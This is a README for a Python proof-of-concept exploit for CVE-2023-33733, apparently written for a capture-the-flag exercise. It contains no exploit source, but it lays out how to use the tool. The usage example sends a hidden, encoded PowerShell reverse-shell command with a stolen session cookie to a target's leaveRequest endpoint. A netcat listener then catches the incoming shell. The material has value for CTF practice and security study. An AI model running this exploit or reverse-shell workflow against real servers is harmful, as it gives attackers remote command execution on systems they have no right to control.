# CVE-2023-33733-POC

# Disclamer
I did not, nor do I take credit for finding this vulnerability.  This is simply a script I built to more easily exploit this vulnerability for a CTF.
For the oiriginal information please reference:

This script is simply intended to be a quick Python3 Script to exploit CVE-2023-33733.  You will need to provide the host, port, command, and a valid session cookie.

# Help Menu
kali@kali:~/Desktop$ python3 --help 
usage: [-h] --host HOST --port PORT --cmd CMD --session SESSION

  -h, --help            show this help message and exit
  --host HOST
  --port PORT, -p PORT
  --cmd CMD, -c CMD
  --session SESSION, --cookie SESSION, -sc SESSION
                        Session cookie

# Usage
kali@kali:~/Desktop$ python3 --host "vuln.server" --port 80 --cmd "powershell -nop -w hidden -e <your revshell code here>" --session "<your cookie here>"
[*] Building Exploit...
[*] Exploit built
[*] Preparing request
[*] Sending request to http://vuln.server:80/leaveRequest
[*] Sending a reverse shell should cause request to hang
[*] Request sent
[*] Probable success. Status Code 500

# Listener
kali@kali:~/Desktop$ nc -lnvp 9001
connect to [] from (UNKNOWN) [] 50246